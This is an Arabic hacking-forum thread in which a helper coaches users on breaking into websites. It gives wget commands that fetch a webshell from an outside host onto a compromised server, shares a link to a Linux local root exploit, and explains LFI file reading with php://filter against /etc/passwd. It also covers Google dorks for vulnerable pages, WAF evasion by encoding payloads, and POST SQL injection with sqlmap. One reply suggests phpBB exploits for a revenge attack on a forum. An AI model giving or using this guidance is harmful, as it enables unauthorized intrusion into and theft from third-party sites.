اخي في كنت رافع شل على موقع والشل انحذف بس اناا كنت عامل اتصال عكسي مع السيرفر ولساتو الاتصال شغال بقدر ارفع كمان مرة الشل عن طريق الاتصال العكس ؟؟
وكيف ؟؟
اهلا بيك المفروض انه بيتم قفل الاتصال اول ما تقفل الصفحة بس الظاهر انك كنت متصل لما تم حذف الشل عشان كده حظك حلو المهم لو صلاحياتك User ممكن ببساطة تتنقل لاى مجلد او تعملك مجلد جديد بالامر mkdir egy هنا بقى عندنا مجلد اسمه egy خش عليه من خلال امر التنقل cd egy وبعدها هتسحب شل بامتداد txt وتحوله بعدها لامتداد php من خلال امر السحب wget http://www.site.com/shell.txt ; mv shell.txt shell.php او ممكن نختصر الامر اللى فوق بالامر التالى برضو وهيتم تنفيذ المطلوب برضو wget http://www.site.com/shell.txt -O shell.php وبعدها استعرض الشل بتاعك من Broswer عادى يا برنس بالتوفيق
السلام عليكم
في عندك هاد 2.6.28.8 local root exploit ؟؟؟؟ الوكل روت تبعو 2009
جرب اللوكال ده يا برنس http://www.gulfup.com/?805g9U لسه رافعه ليك حالا والاصدار ده منتشر كتير اوى ممكن تجرب اى اصدار احدث كمان عادى مفيش مشاكل يعنى ممكن تجرب 2010 و 2011
هل محترفين الهكر هما محترفين الحقن اليدوي مع تخطي مشاكل الحقن اليدوي
و هل يوجد محترف هكر مش محترف الحقن اليدوي ؟
وانت بتعرف تحقن يدوي وتتخطى الحماياات ومشاكل الحقن اليدوي ؟؟
اهلا بيك نبتدى على بركة الله بجزء جزء هل محترفين الهكر هما محترفين الحقن اليدوي ؟ لا مش لازم يا برنس هل يوجد محترف هكر مش محترف الحقن اليدوي ؟ فى كتير يا ريس بس بيبقى عنده معرفة بالحقن اليدوى لتخطى مشاكله والامور التانية وانت بتعرف تحقن يدوي وتتخطى الحماياات ومشاكل الحقن اليدوي ؟؟ والله انا فى 2013 اول ما دخلت المجال ده كنت مدمن ثغرات SQli بس بعد كده بديت اوسع معرفتى بالثغرات التانية وانا من عاشقى sqli وتقدر تقول عليا مبتدأ بدرجة فى ثغرات Sqli الحمد لله يعنى اى موقع كان مصاب معايا واجهتنى حمايات قدرت اتخطاها وساعات بمساعدة ناس خبرة فى مجال sqli بالتوفيق
اوككككككك اوك مصابة هو في ثغرة تانية ان شاء الله يشتغل عليها وشكرا :* :*
ولا يهمك يا برنس احنا دايما فى الخدمة الشكر لله وحده بالتوفيق
اهلا بيك هو هنا بيقولك ان احتمال يكون فيه ثغرة lfi طيب تمام بس لازم تجيب المتغير اللى انت هتشتغل عليه ودى محتاجة انك تشوف الملف المصاب يعنى محتاج تنزل السكربت وتقرأ الكود ممكن يكون مصاب وممكن يكون مش مصاب شوف ثغرة غيرها اضمن يا برنس
والله يا اخي مش عارف ليش اناا بلاقي ثغرات بس مشكلتي في الاستغلال يعني مثلا اكيد بتصير معك
يعني مابلاقي ثغرة sql في الهدق ويكون استغلالهاا سهل بلاقيها blind method post
بدي استغلال لهاد النوع وتخطي مشاكل الحقن والحقن يدوي في ال post صعب وعمري ماسمعت عنو صراحة
اهلا بيك ده من الطبيعى يا ريس ههه اما بخصوص sql Post ده بيتم من خلال اى اداة تقدر من خلالها وظيفتها Request Editor زى مثلا live headers BurpSuit ومن خلالهم تقدر تنفذ اوامر عادى جدا او ببساطة ممكن تشتغل باداة sqlmap او من الHavij اكتب بجوجل " sql injection post via sqlmap " او اى عبارات زى كده وانا هحاول اعمل درس ليها بكذا اداة عشان نبقى منوعين ههه
السلام عليكم
اخي عندي موقع فصحتو في الفيجا بحكيلي انو مصاب بثغرة ال lfi
كيف بدي اتاكد من اصابتو
اهلا يابرنس سؤالى ازاى اخترق منتديات احلى منتدى فيه منتدى بيشتمنى وبيعاملونى وحش وطردونى من هناك وتحدونى انى اخترقهم فياريت تديلى طريقة حلوة كدة
وشكرا ليك يابرنس
اهلا بيك يا ريس دى منتديات مجانية يعنى حتى لا شكل ولا اى حاجة كويسة فيها على العموم افتكر ان المنتديات بتاعتهم بتكون مركبة سكربت phpbb مش فاكر اوى يعنى بصراحة جرب ثغرات السكربت لو طلع هو عليهم او احسن حل نفض لهم يا برنس وشوف حجات اهم منهم
كيف يعني php filter
اهلا بيك php://filter/convert.base64-encode/resource=filename مكان filename حط اسم الملف اللى عاوز تقرأه بالتوفيق
كنت استدعي ملف etc/passwd
حاول تستخدم php Filter يا برنس وجرب مرة كمان
انت خلاص بقيت شبح ومحدش عارف يكلمك B|
لو عرفت انا مين تبقي انت برنس يسطا :"D
أكيد محمد صلاح ههه
اخي بتواجهني مشكلة
Not Acceptable!
ثغرة lfi ^_^
اهلا بيك يعنى انت كنت بتحاول تستدعى ملف وجابلك الحماية دى ؟ ولا امتى بالظبط بتجيلك ؟؟
طيب الفوربدن شو حلها ؟!!
فى كذا حل يا برنس ممكن تشفر الاوامر زى ما قولت قبل كده حاول تلعب فى الاوامر شوية يعنى حرف صغير وحرف كبير حاول تشفر الامر كذا مرة يعنى مش مرة واحدة فكر يا برنس
وكل عام وانت بالف خير يابرنس وينعاد علينا وعليك بالصحة والسلامة
وعليكم ان شاء الله تسلم يا غالى
سامحني بس كيف بقدر اشفر الامر بال base64 وممكن مثال ؟
اهلا بيك ببساطة ممكن من خلال اى موقع بيعمل الخدمة دى اونلاين ودول كتير ممكن كمثال الموقع البسيط ده https://www.base64decode.org/ او ممكن من خلال اى اداة بتعمل الخدمة نفسها زى Coder او ممكن من خلال اضافة فى الفايرفوكس اسمها HackBar وحجات كتيرة يا ريس
اخي ممكن دوركات لثغرة lfi
لو كتبت فى جوجل هتلاقى كتير بس دول كبداية php?action= , php?file= يعنى عشان تعمل Test لثغرة lfi ممكن بعد اى متغير زى اللى فوق كمثال يعنى تكتب اى حاجة مثلا ElSyad اذا ظهرلك خطأ Include , Require والدوال اللى انا وضحتها فى الرد اللى قبل ده يبقى الموقع مصاب بالثغرة بالتوفيق
السلام عليكم
فحصت موقع وطلعي انو مصاب في ثغرة shell injection شو هاي الثغرة وكيف بقدر استغلها ؟؟؟
هي الصورة
http://im62.gulfup.com/yQQJMJ.png
اهلا بيك ثغرات Shell Injection هيا ثغرات بيتم استغلالها فى تطبيق اوامر لحقن شل الدوال المصابة هيا نفسها دوال تنفيذ الاوامر بلغة php بس بخصوص حدوث الثغرة دى اكتر دالة بيتم استخدامها والله اعلم shell_exec ممكن تعرف اكتر عن الدالة من خلال موقع php.net بخصوص التطبيق هرد عليك فى السؤال التانى